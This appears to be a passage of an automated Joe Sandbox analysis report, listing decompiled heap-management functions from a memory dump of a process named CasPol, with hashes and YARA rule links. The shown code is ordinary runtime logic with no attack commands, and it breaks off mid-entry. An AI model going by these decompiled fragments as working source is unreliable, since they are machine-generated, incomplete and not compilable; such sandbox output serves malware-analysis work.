                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1be671bbed74998db36a4f009ebf0457f4554bf59067df18e094be399d328ca
                                                                        • Instruction ID: 9e68f31d5eec134789774939b91cbe58bc45e25386799cdb8e3c060b0e5d65c8
                                                                        • Opcode Fuzzy Hash: c1be671bbed74998db36a4f009ebf0457f4554bf59067df18e094be399d328ca
                                                                        • Instruction Fuzzy Hash: C9E09273A05422ABD2225B1CBC00F66779DDBE4659F0A4039EA05D7354D628DD11CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BF358 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E013BF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E013EF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L013D4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                        0x013bf35d
                                                                        0x013bf361
                                                                        0x013bf367
                                                                        0x013bf372
                                                                        0x013bf38c
                                                                        0x013bf38c
                                                                        0x013bf394

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                        • Instruction ID: be27f7b023b3b12d6508dbedc9b4a70abd90e8a1d3e0036b282fde82b1278b7c
                                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                        • Instruction Fuzzy Hash: A9E0DF32A41228FBDB21AADD9E05FAABFACDB58A64F000195BA08D7590E5759E00C3D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013CFF60 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013CFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x13911a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E014888F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E013D0050(_t14);
				}
			}










                                                                        0x013cff66
                                                                        0x013cff6b
                                                                        0x00000000
                                                                        0x013cff8f
                                                                        0x00000000
                                                                        0x013cff8f

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4a40113259011de1f043164151a6918d4fb05745154e5ad8203e22aac966d5b7
                                                                        • Instruction ID: 4a7bb7ab069bfd75f5c99cfd7ce929ee647dc11c4612b40d765964188769f264
                                                                        • Opcode Fuzzy Hash: 4a40113259011de1f043164151a6918d4fb05745154e5ad8203e22aac966d5b7
                                                                        • Instruction Fuzzy Hash: A5E0D8B11052069FD735D759D040F19379DDB51E29F19801DE40847502C621DD44C385
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014441E8 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E014441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x14908f0);
				_t5 = E0140D08C(__ebx, __edi, __esi);
				if( *0x14a87ec == 0) {
					E013CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x14a87ec == 0) {
						 *0x14a87f0 = 0x14a87ec;
						 *0x14a87ec = 0x14a87ec;
						 *0x14a87e8 = 0x14a87e4;
						 *0x14a87e4 = 0x14a87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01444248();
				}
				return E0140D0D1(_t5);
			}





                                                                        0x014441e8
                                                                        0x014441ea
                                                                        0x014441ef
                                                                        0x014441fb
                                                                        0x01444206
                                                                        0x0144420b
                                                                        0x01444216
                                                                        0x0144421d
                                                                        0x01444222
                                                                        0x0144422c
                                                                        0x01444231
                                                                        0x01444231
                                                                        0x01444236
                                                                        0x0144423d
                                                                        0x0144423d
                                                                        0x01444247

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 350c062fbd6ff09afc2991cc2568e9de8a46fdf1de815472f31edbf81f8d2de7
                                                                        • Instruction ID: a98768ccd069cd20c54fc11b5c23e8e637073f1277f2bca32505d33b00956436
                                                                        • Opcode Fuzzy Hash: 350c062fbd6ff09afc2991cc2568e9de8a46fdf1de815472f31edbf81f8d2de7
                                                                        • Instruction Fuzzy Hash: 79F0157C960702CFDBB1EFAA9900714BEA4F764396F92412B9104872B8C73449A4CF01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0146D380 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0146D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L013BE8B0(__ecx, _a4, 0xfff);
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                        0x0146d38a
                                                                        0x0146d39b
                                                                        0x0146d3b1
                                                                        0x00000000
                                                                        0x0146d3b6
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                        • Instruction ID: 50ef36f1ac4df9b264acb8e6f5e80cf4a973be39e16683c5f61fed7376b4460e
                                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                        • Instruction Fuzzy Hash: E2E0CD31340605B7DB225E48CC00FB57B19DF50798F104031FE485ABA0C5719C91D6C4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EA185 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013EA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x14a67e4 >= 0xa) {
					if(_t5 < 0x14a6800 || _t5 >= 0x14a6900) {
						return L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E013D0010(0x14a67e0, _t5);
				}
			}





                                                                        0x013ea190
                                                                        0x013ea1a6
                                                                        0x013ea1c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ea192
                                                                        0x013ea192
                                                                        0x013ea19f
                                                                        0x013ea19f

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e2fea9037eb6cf5bef3b86c9f4d48b58d73dcbf17e9932f829d70c7680e2be5
                                                                        • Instruction ID: 862e1c32424dd65959c8d6b4575ba39fa4654896dbc172d38a72a77eb6247b5b
                                                                        • Opcode Fuzzy Hash: 5e2fea9037eb6cf5bef3b86c9f4d48b58d73dcbf17e9932f829d70c7680e2be5
                                                                        • Instruction Fuzzy Hash: 42D02E621311106AD62D2304A818B353A96F7A0B68FBF480EF2134BAF0EB70C8D48209
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E16E0 Relevance: .0, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013E16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E013E1710(0x14a67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L013D4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                        0x013e16e8
                                                                        0x013e16ef
                                                                        0x013e16f3
                                                                        0x013e16fe
                                                                        0x00000000
                                                                        0x013e1700
                                                                        0x013e170d
                                                                        0x013e170d
                                                                        0x013e16f2
                                                                        0x013e16f2
                                                                        0x013e16f2
                                                                        0x013e16f2

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34b909348df3574aaed500b8e6ded109c038a48c9e294a50c4af2cd6f1f1567b
                                                                        • Instruction ID: 6a611bc151a19d8b8754f6219136a1c60aff634a46a48e9f9e58f78f44cf2dd5
                                                                        • Opcode Fuzzy Hash: 34b909348df3574aaed500b8e6ded109c038a48c9e294a50c4af2cd6f1f1567b
                                                                        • Instruction Fuzzy Hash: 02D0A73124030192EA2D5F189848B142691EB94BA9F38005CF607598D0CFB4CD92E448
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014353CA Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E014353CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E013CEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                        0x014353ca
                                                                        0x014353ce
                                                                        0x014353d9
                                                                        0x014353de
                                                                        0x014353e1
                                                                        0x014353e1
                                                                        0x014353e6
                                                                        0x014353f3
                                                                        0x00000000
                                                                        0x014353f8
                                                                        0x014353fb

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                        • Instruction ID: 6f4c0540c5b40a90c11e0e80bf33814b121f7cdcb86344cecc5d3825a1b27382
                                                                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                        • Instruction Fuzzy Hash: 91E08232A046809BCF12EB8CCA90F6EBBF9FB88B00F190418A0086F730C634AC00CB00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013CAAB0 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013CAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                        0x013caab6
                                                                        0x013caabb
                                                                        0x0141a442
                                                                        0x00000000
                                                                        0x0141a448
                                                                        0x0141a454
                                                                        0x0141a454
                                                                        0x013caac1
                                                                        0x013caac1
                                                                        0x013caac6
                                                                        0x013caac6

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                        • Instruction ID: 14f09898891d6570e07e72a08ee886fdbcc9fb93c7bdbae3bd59bb1229904075
                                                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                        • Instruction Fuzzy Hash: 97D0E939352990CFE617CB1DC554B1677A4BB44B44FD504A4E541CB766E63DDD44CA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E35A1 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013E35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E013CEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                        0x013e35a1
                                                                        0x013e35a1
                                                                        0x013e35a5
                                                                        0x013e35ab
                                                                        0x013e35ab
                                                                        0x013e35b5
                                                                        0x00000000
                                                                        0x013e35c1
                                                                        0x013e35b7

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                        • Instruction ID: 70cbccf822bbeaa37d8746cb12b8c7e96dd8d29468fea80e597b923fb1ea5c61
                                                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                        • Instruction Fuzzy Hash: 5ED0A931401395DAEB02AB18C21C7783BF2BB0030CF582069800207BD2C33A4A0AD700
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BDB40 Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013BDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L013D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                        0x013bdb4d
                                                                        0x013bdb54
                                                                        0x013bdb5f
                                                                        0x013bdb56
                                                                        0x013bdb56
                                                                        0x013bdb5c
                                                                        0x013bdb5c

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                        • Instruction ID: ec4eeda8d5824fef7f291e05f6597bbf83adea1ba6738964501713fd6c88b15f
                                                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                        • Instruction Fuzzy Hash: EDC08C31280A01AAEB225F24CD41B403AA0BB10B0DF4400A06301DA8F0EB7CD901E600
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0143A537 Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0143A537(intOrPtr _a4, intOrPtr _a8) {

				return L013D8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                        0x0143a553

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                        • Instruction ID: e242f2d7bf2027a1a8b9a76e862c5309d2f590a859150b5028c6b8c1e1e4a80c
                                                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                        • Instruction Fuzzy Hash: 0CC08C33080248BBCB126F85DC00F06BF2AFBA4B60F008010FA080B570C632E970EB84
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013D3A1C Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013D3A1C(intOrPtr _a4) {
				void* _t5;

				return L013D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                        0x013d3a35

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                        • Instruction ID: 3b277e895f48bec8c9ee8832647e5927eca30c815f16d16cf852bfcaab1fa361
                                                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                        • Instruction Fuzzy Hash: 5BC04C33180648BBC7126E45ED41F157B69E7A4B60F154021B6050A9618576ED61D598
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BAD30 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013BAD30(intOrPtr _a4) {

				return L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                        0x013bad49

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                        • Instruction ID: eb56fbf7c702962a89e413ccf0e9d8eafcb772e49a074edf0d8bc19aeda27f13
                                                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                        • Instruction Fuzzy Hash: D1C02B330C0248BBC7126F49DD00F11BF2DE7A0B60F010020F6040B671C932EC61D588
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013C76E2 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013C76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                        0x013c76e4
                                                                        0x00000000
                                                                        0x013c76f8
                                                                        0x013c76fd

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                        • Instruction ID: 77cae82f05fa151af77486caaa40cc252f5ab37f05ebaa0f97fa5bc05fa3a3eb
                                                                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                        • Instruction Fuzzy Hash: 8DC08C711411805AEB2A570CCE22B303A50AB08B1CF88019CAE01094A2C368AC23CB08
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E36CC Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013E36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                        0x013e36d2
                                                                        0x013e36e8
                                                                        0x013e36d4
                                                                        0x013e36e5
                                                                        0x013e36e5

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                        • Instruction ID: 6c1d49a9828784c6342462e3e5bcfc95b20ee2d620ba141bb64920f8516e901e
                                                                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                        • Instruction Fuzzy Hash: D1C02B71151440FBD7151F34CD80F147294F700A35F6403547221468F0D53C9D00D500
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013D7D50 Relevance: .0, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013D7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                        0x013d7d56
                                                                        0x013d7d5b
                                                                        0x013d7d60
                                                                        0x013d7d5d
                                                                        0x013d7d5d
                                                                        0x013d7d5d

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                        • Instruction ID: 789fb2a2d573b3bad3b144a12f85008c8f0ee0b369d21aa02ec7ec3bcf8f6bff
                                                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                        • Instruction Fuzzy Hash: 64B092363019408FCE16DF18C080B1533E4BB45A88B8400D4E400CBA21D229E8008900
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E2ACB Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013E2ACB() {
				void* _t5;

				return E013CEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                        0x013e2adc

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                        • Instruction ID: a3b5290a5811122c28723754a2790aa55f1e29b2279cdc610a548d60fd668c7d
                                                                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                        • Instruction Fuzzy Hash: 14B01232C10441CFCF02EF44C610B297731FB00B50F0544A4900127A30C228AC01DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9950 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9aa90f1b90adaf4984dc15717aec98f79696b7686ede501f23a1ac72487eba1
                                                                        • Instruction ID: 18b40c6460b620df4de22e6e351806724db31b75fbbfdf57062ff49b79c7a521
                                                                        • Opcode Fuzzy Hash: f9aa90f1b90adaf4984dc15717aec98f79696b7686ede501f23a1ac72487eba1
                                                                        • Instruction Fuzzy Hash: C19002A160540403D14165DA48046070005A7D0342F51C022A205455AECBB98C557175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F99D0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d97a61d8110c17f8b98529b87b7f4e90c5514a5e5bc5f24f443203ee039b7eb
                                                                        • Instruction ID: 48d1e2649f296673ccc69c2efe014b81275d40a265cee2a416a0543bea9a1e97
                                                                        • Opcode Fuzzy Hash: 6d97a61d8110c17f8b98529b87b7f4e90c5514a5e5bc5f24f443203ee039b7eb
                                                                        • Instruction Fuzzy Hash: FB9002A161500042D10561DA44047060045A7E1241F51C023A2144559CC6B98C656165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9820 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f580b37440ea1b40bef5e060f60a09b49e8a0cbc4f3a891b2c38fae641ca1829
